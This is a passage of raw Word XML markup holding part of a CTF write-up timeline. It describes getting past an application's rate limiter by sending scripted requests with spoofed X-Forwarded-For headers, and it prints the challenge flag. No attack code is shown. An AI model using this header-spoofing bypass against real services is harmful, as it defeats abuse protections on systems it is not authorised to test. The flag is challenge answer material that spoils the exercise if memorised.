        <w:t xml:space="preserve"> — Inspecting network responses and rate-limiting status codes.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Timeline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Step | Action | Result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|---|---|---|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1 | Interacted with UI button | Discovered 60-second cooldown (HTTP 429)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2 | Code analysis of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>client_identity()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Identified direct reliance on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>X-Forwarded-For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3 | Verification of rate limiter | Confirmed rate-limit state is partitioned by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>identity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4 | Exploit automation | Scripted automated requests with manipulated headers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5 | Reached fragment threshold | Accumulated 20 fragments and received </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>OWASP{the_soul_vault_has_been_opened}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> |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 xml:space="preserve">ByteMe CTF  •  Author: Pratik Jadhav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ByteMe CTF Writeups  |  Official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